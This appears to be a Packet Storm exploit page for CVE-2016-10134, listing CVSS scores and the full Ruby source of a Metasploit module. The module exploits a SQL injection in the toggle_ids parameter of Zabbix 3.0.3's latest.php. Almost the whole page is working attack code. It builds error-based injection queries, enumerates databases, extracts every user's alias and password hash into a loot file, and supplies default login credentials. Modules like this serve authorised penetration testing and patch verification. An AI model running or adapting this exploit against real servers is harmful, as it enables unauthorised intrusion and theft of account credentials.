Zabbix toggle_ids SQL Injection

2024-08-3100:00:00

bperry, 1n3[at]hushmail.com, metasploit.com

packetstormsecurity.com

zabbix

sql injection

exploit

username

password

json

file

security

vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Zabbix toggle_ids SQL Injection',  
'Description' => %q{  
This module will exploit a SQL injection in Zabbix 3.0.3 and  
likely prior in order to save the current usernames and  
password hashes from the database to a JSON file.  
},  
'References' =>  
[  
['CVE', '2016-10134'],  
['URL', 'https://seclists.org/fulldisclosure/2016/Aug/60']  
],  
'Author' =>  
[  
'[email protected]', #discovery  
'bperry' #module  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2016-08-11'  
))  
  
register_options(  
[  
OptBool.new('REQUIREAUTH', [true, 'Enforce authentication', false]),  
OptString.new('USERNAME', [false, 'The username to authenticate with', 'Admin']),  
OptString.new('PASSWORD', [false, 'The password to authenticate with', 'zabbix']),  
OptString.new('TARGETURI', [true, 'The relative URI for Zabbix', '/zabbix'])  
])  
end  
  
def check  
  
sid, cookies = authenticate  
  
left_marker = Rex::Text.rand_text_alpha(5)  
right_marker = Rex::Text.rand_text_alpha(5)  
flag = Rex::Text.rand_text_alpha(5)  
  
query = "AND (SELECT 1256 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"  
query << ",(SELECT MID((IFNULL(CAST(0x#{flag.unpack("H*")[0]} AS CHAR),0x20)),1,54)"  
query << " FROM dual LIMIT 0,1),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"  
query << ' INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'  
  
res = make_injected_request(query, sid, cookies)  
  
unless res and res.body  
return Msf::Exploit::CheckCode::Safe  
end  
  
match = /#{left_marker}(.*)#{right_marker}/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
if match[1] == flag  
return Msf::Exploit::CheckCode::Vulnerable  
end  
  
Msf::Exploit::CheckCode::Safe  
end  
  
def run  
sid, cookies = authenticate  
  
left_marker = Rex::Text.rand_text_alpha(5)  
right_marker = Rex::Text.rand_text_alpha(5)  
  
query = " AND (SELECT 5361 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"  
query << ",(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM"  
query << " INFORMATION_SCHEMA.SCHEMATA),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x"  
query << " FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"  
  
res = make_injected_request(query, sid, cookies)  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
match = /#{left_marker}(.*)#{right_marker}/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
count = match[1].to_i  
  
dbs = []  
0.upto(count-1) do |cur|  
  
get_dbs = " AND (SELECT 5184 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"  
get_dbs << ",(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,54)"  
get_dbs << " FROM INFORMATION_SCHEMA.SCHEMATA LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]},"  
get_dbs << "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"  
  
res = make_injected_request(get_dbs, sid, cookies)  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
match = /#{left_marker}(.*)#{right_marker}/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
dbs << match[1]  
end  
  
dbs.delete("mysql")  
dbs.delete("performance_schema")  
dbs.delete("information_schema")  
  
users = []  
dbs.each do |db|  
cols = ["alias", "passwd"]  
  
user_count = " AND (SELECT 6262 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"  
user_count << ",(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM"  
user_count << " #{db}.users),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM"  
user_count << " INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"  
  
res = make_injected_request(user_count, sid, cookies)  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
match = /#{left_marker}(.*)#{right_marker}/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
count = match[1].to_i  
  
0.upto(count-1) do |cur|  
user = {}  
cols.each do |col|  
get_col = " AND (SELECT 6334 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]}"  
get_col << ",(SELECT MID((IFNULL(CAST(#{col} AS CHAR),0x20)),1,54)"  
get_col << " FROM #{db}.users ORDER BY alias LIMIT #{cur},1),0x#{right_marker.unpack("H*")[0]}"  
get_col << ',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)'  
  
res = make_injected_request(get_col, sid, cookies)  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
match = /#{left_marker}(.*)#{right_marker}/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
user[col] = match[1]  
end  
users << user  
end  
end  
  
loot = store_loot("zabbixusers.json","text/plain", rhost, users.to_json)  
  
print_good('Users and password hashes stored at ' + loot)  
  
end  
  
def authenticate  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'index.php')  
})  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
cookies = res.get_cookies  
  
match = /name="sid" value="(.*?)">/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
sid = match[1]  
  
if datastore['REQUIREAUTH']  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'index.php'),  
'method' => 'POST',  
'vars_post' => {  
'sid' => sid,  
'form_refresh' => 1,  
'name' => datastore['USERNAME'],  
'password' => datastore['PASSWORD'],  
'autologin' => 1,  
'enter' => 'Sign in'  
},  
'cookie' => cookies  
})  
  
unless res  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
if res.code == 302  
cookies = res.get_cookies  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'latest.php'),  
'vars_get' => {  
'ddreset' => '1'  
},  
'cookies' => cookies  
})  
  
unless res and res.body  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
cookies = res.get_cookies  
match = /name="sid" value="(.*?)">/.match(res.body)  
  
unless match  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
  
sid = match[1]  
elsif  
fail_with(Failure::Unknown, 'Server did not respond in an expected way')  
end  
end  
  
return sid, cookies  
end  
  
def make_injected_request(sql, sid, cookies)  
send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'latest.php'),  
'method' => 'POST',  
'vars_get' => {  
'output' => 'ajax',  
'sid' => sid  
},  
'vars_post' => {  
'favobj' => 'toggle',  
'toggle_ids[]' => '348 ' + sql,  
'toggle_open_state' => 0  
},  
'cookie' => cookies  
})  
end  
end  
`